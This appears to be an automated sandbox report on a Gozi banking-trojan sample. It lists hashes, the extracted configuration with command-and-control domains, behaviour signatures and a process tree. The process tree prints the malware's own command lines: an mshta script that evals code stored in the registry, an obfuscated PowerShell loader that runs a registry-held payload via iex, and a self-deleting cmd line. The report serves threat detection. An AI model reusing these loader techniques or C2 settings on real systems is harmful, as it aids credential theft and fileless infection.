Analysis
-
max time kernel
151s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
-
submitted
07-10-2023 03:42
General
-
Target
7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe
-
Size
304KB
-
MD5
a3f4c907a088c99a8b7bf5f4280d7d0c
-
SHA1
9a9297bd0af1c008eb7477c1e310ce70c30c6d56
-
SHA256
7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6
-
SHA512
106a0a4275a421a6dbef6c43e76921e6eae1aca5f6d960f823763a3127b7ebf826c626da460db82451aba4a94c32c8c198d6871b0a2c6de7d96c937384e92f9b
-
SSDEEP
6144:Oo+91vDNpa6NK56upTHirwtc3nhBvjQOR/Oz2IHTN+:ONDLu4K56u1HqfhBvjQOWz2W
Malware Config
Extracted
gozi
Extracted
gozi
5050
mifrutty.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
http://igrovdow.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Gozi
Gozi is a well-known and widely distributed banking trojan.
-
Dave packer 1 IoCs
Detects executable using a packer named 'Dave' by the community, based on a string at the end.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Suspicious use of SetThreadContext 8 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 46 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe"C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lfov='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lfov).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\5C68964F-0BE8-EE1D-7550-6F0279841356\\\MaskControl'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name mydjmpyc -value gp; new-alias -name rkbayar -value iex; rkbayar ([System.Text.Encoding]::ASCII.GetString((mydjmpyc "HKCU:Software\AppDataLow\Software\Microsoft\5C68964F-0BE8-EE1D-7550-6F0279841356").PlaySystem))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mccluqyx\mccluqyx.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9B4.tmp" "c:\Users\Admin\AppData\Local\Temp\mccluqyx\CSC9E301EC8FF234040BC81DA785E61DD53.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sbknyvs1\sbknyvs1.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEBC7.tmp" "c:\Users\Admin\AppData\Local\Temp\sbknyvs1\CSC6F52F2CABE8E4DA394AFDDA0F490A8DA.TMP"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD55920286e79a59d107577be4b3806ff3a
SHA1abbc6c4c6cdf675ad2591cbc7eebfab606536a35
SHA256bd0ab625d9662122a8c1cd3f2acd67e0b399e67218304ce12050390d2872273a
SHA5126631f3c52a9e487b2ccb78dfa30e3d5ed7ab398892c11def4ea309a2f763faa7a5f56cf2f13ae704b65b6112963d7fc02ff8db61232e3cdc17c15a8b5973146f
-
Filesize
1KB
MD5df50ea900a2e696393ccc610b24a2a2d
SHA11af2f00b43ab6ee2c0e36f4f16b2c28f6fd50565
SHA2565ebc4395b49df040cc20eed846ea15bb51e09c3070d46485091cba7d8b9d67b4
SHA512bab4960882414ad4be319027d5cc79ee26fcb594e2623c75b9d7455ec23194d97c1745e13d8ea535392bfb36c8733b5247cc6bb484eacaf35ed7765df174fecb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD55337c2eda44eeec787d0b3ca94156d00
SHA1772e8f1bc6a1942bf412e41d9c35cff31bcefa35
SHA256fb39cf84e564a8bae23d94b7b3a010a53e9bb74b9ff0af4b3bc07732ea9c242c
SHA5121295e4e1c95a8a4112bc3adaacd721f537930ab64de939203ba83009d35d1cb9c082e88a858db8716dfdc1da66b208ce118f7d1d5d5275052386f9c09028383e
-
Filesize
3KB
MD57f3eb56237cc86b77903e84e3c70b014
SHA1093fa6bbce63d2f34d6136815d59ac2aba79079c
SHA256211999c0e9ad15f7753da7f48040ec1722d220cb4600b7ec12e0833fae5d3485
SHA51237a1fd3b441b035c9a8549b909ca55a19df5cbe101a6f6a435aff4edaadc00e23598224323b47c9f16b23007202491aae9ab088918660290510943b268d02a5b
-
Filesize
652B
MD50268fb05795dc657738d8cb79d8bed04
SHA17b8e9c8a74cd9ae10921b12fae94d28eb450a8f1
SHA256880f5bcf0a993ff9098ac2d7022ee63a85b89a00dc64c9202e9838e20c42369a
SHA512f2a2cca8a11a8df8c38fe074236f42d46cc1c327d0475e11e87f44a02805bc4cf3481ae9b321c6b8e847903363f450cb5ffe3f47a65118f588ebe562d3c54c98
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD540f6b24f4177ee626d27842398e039fc
SHA1a141418a36fc90aa23bdfa56ecc0a6fc2057365a
SHA256446d0e8744853e8e8f49a6874c9a2abbb2a2d9fb7b9aef29697bba73ba5327dd
SHA51255ff9d5b4a9bca267bf7bdb5620401cf2de58f28cf1d3508b33cefcc07272daede30382176b17b760944968acc63a1aee354e921e6a2c14c48ac5e10aea85e68
-
Filesize
652B
MD58d11f4f9c2221ac7352b1a34341d727c
SHA1a6e8683d2227185c4dc5ee6e26f75af4a299ffa3
SHA256d8f12e32b02e043632653a1fb39e06434a7a6c8bb18ca9ef8353e65189676eb6
SHA512097bd5ad451053601c6ceceb5253ef93ea31caaac12f3f5a91d2d7d1259005942dcf2d9c769d2a4e71c862e02e5732af026c33e2afb9403aa8aa48d99407bc3f
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD5604005a18726b955c224efd27b64c3bb
SHA1059d24655dd0cfaabd8a4bacdde251423729ecb9
SHA25611cee785777325d7377ccca3515afd7520f818bbcf0808297d45ec5804de6f80
SHA51218b659a03fb8c5543de718a2b066a0e68923b0803da6853255183b7e338c70b63eddbd623481cfbd867006c381b1fffac740b531357efa61967e46b678c8a18c
-
Filesize
656KB
-
Filesize
656KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
32KB
-
Filesize
64KB
-
Filesize
244KB
-
Filesize
244KB
-
Filesize
4KB
-
Filesize
656KB
-
Filesize
656KB
-
Filesize
4KB
-
Filesize
656KB
-
Filesize
656KB
-
Filesize
608KB
-
Filesize
608KB
-
Filesize
4KB
-
Filesize
656KB
-
Filesize
656KB
-
Filesize
4KB
-
Filesize
656KB
-
Filesize
656KB
-
Filesize
4KB
-
Filesize
656KB
-
Filesize
4KB
-
Filesize
656KB
-
Filesize
4KB
-
Filesize
656KB
-
Filesize
656KB
-
Filesize
60KB
-
Filesize
52KB
-
Filesize
60KB
-
Filesize
48KB